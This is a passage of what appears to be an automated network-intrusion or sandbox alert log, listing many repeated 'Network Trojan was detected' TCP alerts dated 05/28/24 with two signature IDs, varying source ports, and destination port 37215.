            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920156
            SID:2829579
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993463
            SID:2835222
            Source Port:57240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128782
            SID:2829579
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133868
            SID:2829579
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383953
            SID:2829579
            Source Port:42644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941710
            SID:2835222
            Source Port:55570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014633
            SID:2835222
            Source Port:48384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507068
            SID:2829579
            Source Port:44022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644040
            SID:2829579
            Source Port:59234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864634
            SID:2835222
            Source Port:39974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818839
            SID:2835222
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818257
            SID:2835222
            Source Port:60462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756941
            SID:2835222
            Source Port:43754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755980
            SID:2829579
            Source Port:44574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737753
            SID:2835222
            Source Port:53968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376998
            SID:2835222
            Source Port:57154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753747
            SID:2835222
            Source Port:56516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869775
            SID:2829579
            Source Port:44178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837003
            SID:2835222
            Source Port:52138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.769869
            SID:2829579
            Source Port:35128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771433
            SID:2829579
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067320
            SID:2835222
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714756
            SID:2829579
            Source Port:42264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754154
            SID:2829579
            Source Port:60960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848949
            SID:2835222
            Source Port:33520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052402
            SID:2829579
            Source Port:42856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779404
            SID:2835222
            Source Port:40160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059940
            SID:2835222
            Source Port:48124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368226
            SID:2829579
            Source Port:49180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728417
            SID:2829579
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900772
            SID:2829579
            Source Port:42880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766970
            SID:2829579
            Source Port:44684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964767
            SID:2829579
            Source Port:45148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251017
            SID:2829579
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756648
            SID:2829579
            Source Port:60052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251998
            SID:2829579
            Source Port:38278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575000
            SID:2829579
            Source Port:52876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182264
            SID:2829579
            Source Port:48866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969737
            SID:2829579
            Source Port:38832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946274
            SID:2835222
            Source Port:45066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863585
            SID:2835222
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.962393
            SID:2835222
            Source Port:34528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423275
            SID:2829579
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899890
            SID:2829579
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326840
            SID:2829579
            Source Port:34528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669872
            SID:2829579
            Source Port:60384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995927
            SID:2829579
            Source Port:47828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020562
            SID:2829579
            Source Port:56244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697509
            SID:2829579
            Source Port:47830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062012
            SID:2835222
            Source Port:36964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772080
            SID:2835222
            Source Port:42050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516559
            SID:2829579
            Source Port:39464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782441
            SID:2835222
            Source Port:54372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935965
            SID:2835222
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485533
            SID:2835222
            Source Port:52438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920137
            SID:2835222
            Source Port:53798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818264
            SID:2829579
            Source Port:47070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761067
            SID:2829579
            Source Port:48834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745550
            SID:2835222
            Source Port:54344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506824
            SID:2829579
            Source Port:49564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745068
            SID:2829579
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768027
            SID:2835222
            Source Port:41166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670466
            SID:2835222
            Source Port:54990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280930
            SID:2835222
            Source Port:56346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954687
            SID:2835222
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882226
            SID:2835222
            Source Port:57524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830554
            SID:2829579
            Source Port:50826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.676686
            SID:2829579
            Source Port:35612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075347
            SID:2829579
            Source Port:59606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001372
            SID:2835222
            Source Port:48174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005273
            SID:2835222
            Source Port:48930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957303
            SID:2829579
            Source Port:50526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809496
            SID:2829579
            Source Port:36524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810111
            SID:2829579
            Source Port:53040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868648
            SID:2835222
            Source Port:52524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423078
            SID:2835222
            Source Port:32812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917770
            SID:2835222
            Source Port:35340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.057798
            SID:2835222
            Source Port:47418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870359
            SID:2829579
            Source Port:52794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319100
            SID:2835222
            Source Port:46084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917582
            SID:2829579
            Source Port:37898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852135
            SID:2835222
            Source Port:47842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953614
            SID:2829579
            Source Port:45292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789187
            SID:2835222
            Source Port:54118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412772
            SID:2829579
            Source Port:54226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047855
            SID:2835222
            Source Port:51396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928761
            SID:2829579
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261218
            SID:2835222
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875263
            SID:2829579
            Source Port:34854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855318
            SID:2829579
            Source Port:39392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604310
            SID:2835222
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788934
            SID:2835222
            Source Port:37390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928825
            SID:2829579
            Source Port:42042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033597
            SID:2829579
            Source Port:42120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910514
            SID:2829579
            Source Port:52624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972524
            SID:2835222
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394173
            SID:2829579
            Source Port:51576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.682194
            SID:2829579
            Source Port:45278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843101
            SID:2835222
            Source Port:59216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703888
            SID:2835222
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734425
            SID:2835222
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857135
            SID:2829579
            Source Port:45224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071592
            SID:2829579
            Source Port:38452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917340
            SID:2835222
            Source Port:35496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944044
            SID:2829579
            Source Port:35442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066153
            SID:2829579
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821509
            SID:2835222
            Source Port:33562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310660
            SID:2835222
            Source Port:34526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860580
            SID:2829579
            Source Port:43356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669810
            SID:2835222
            Source Port:58560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058614
            SID:2835222
            Source Port:43088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084630
            SID:2835222
            Source Port:53946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587405
            SID:2835222
            Source Port:41956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714794
            SID:2835222
            Source Port:60102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946847
            SID:2835222
            Source Port:39754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421694
            SID:2835222
            Source Port:53990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563432
            SID:2829579
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789992
            SID:2835222
            Source Port:50910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849606
            SID:2829579
            Source Port:54782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076692
            SID:2829579
            Source Port:38450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.767568
            SID:2835222
            Source Port:52236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788976
            SID:2829579
            Source Port:42630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436550
            SID:2829579
            Source Port:55980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846731
            SID:2835222
            Source Port:49594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048206
            SID:2829579
            Source Port:41268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280261
            SID:2835222
            Source Port:38916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617082
            SID:2829579
            Source Port:54116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435248
            SID:2829579
            Source Port:38664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278182
            SID:2829579
            Source Port:36644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552815
            SID:2835222
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809619
            SID:2829579
            Source Port:33396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034876
            SID:2835222
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716779
            SID:2829579
            Source Port:35124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850322
            SID:2829579
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387403
            SID:2829579
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030921
            SID:2835222
            Source Port:50320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563431
            SID:2835222
            Source Port:57802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898897
            SID:2835222
            Source Port:44276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552653
            SID:2835222
            Source Port:60042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954129
            SID:2829579
            Source Port:54412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736309
            SID:2835222
            Source Port:58752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871509
            SID:2829579
            Source Port:57778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713490
            SID:2829579
            Source Port:39668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.143400
            SID:2829579
            Source Port:44086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.407748
            SID:2829579
            Source Port:56748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767419
            SID:2829579
            Source Port:40776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299028
            SID:2829579
            Source Port:49462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084795
            SID:2829579
            Source Port:39634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809221
            SID:2829579
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371521
            SID:2829579
            Source Port:34642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811155
            SID:2835222
            Source Port:37910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962765
            SID:2829579
            Source Port:46388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072902
            SID:2835222
            Source Port:46684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713189
            SID:2835222
            Source Port:55998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.661558
            SID:2829579
            Source Port:44386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544084
            SID:2835222
            Source Port:41720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728363
            SID:2829579
            Source Port:53026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620731
            SID:2829579
            Source Port:38154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559153
            SID:2829579
            Source Port:49764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020303
            SID:2829579
            Source Port:43142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302203
            SID:2835222
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063842
            SID:2835222
            Source Port:51032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534020
            SID:2835222
            Source Port:43670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435800
            SID:2835222
            Source Port:57658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052840
            SID:2835222
            Source Port:42910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840332
            SID:2835222
            Source Port:39730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961360
            SID:2829579
            Source Port:33464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733863
            SID:2829579
            Source Port:34976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894291
            SID:2835222
            Source Port:57418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071600
            SID:2829579
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623022
            SID:2835222
            Source Port:41066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278219
            SID:2835222
            Source Port:60786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061565
            SID:2829579
            Source Port:50306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725636
            SID:2829579
            Source Port:33930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385555
            SID:2829579
            Source Port:49874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818708
            SID:2829579
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275441
            SID:2829579
            Source Port:45142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756591
            SID:2835222
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231039
            SID:2835222
            Source Port:54022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450922
            SID:2835222
            Source Port:42886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064334
            SID:2835222
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833761
            SID:2835222
            Source Port:55762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953035
            SID:2829579
            Source Port:43576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807745
            SID:2829579
            Source Port:52024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881049
            SID:2829579
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922203
            SID:2835222
            Source Port:40788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722092
            SID:2829579
            Source Port:42862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709580
            SID:2829579
            Source Port:39790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919026
            SID:2835222
            Source Port:35246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739575
            SID:2829579
            Source Port:37240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715612
            SID:2835222
            Source Port:38340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432509
            SID:2829579
            Source Port:47234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542714
            SID:2835222
            Source Port:35840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445298
            SID:2829579
            Source Port:42400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712904
            SID:2835222
            Source Port:58766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470820
            SID:2829579
            Source Port:46504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782306
            SID:2829579
            Source Port:54710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
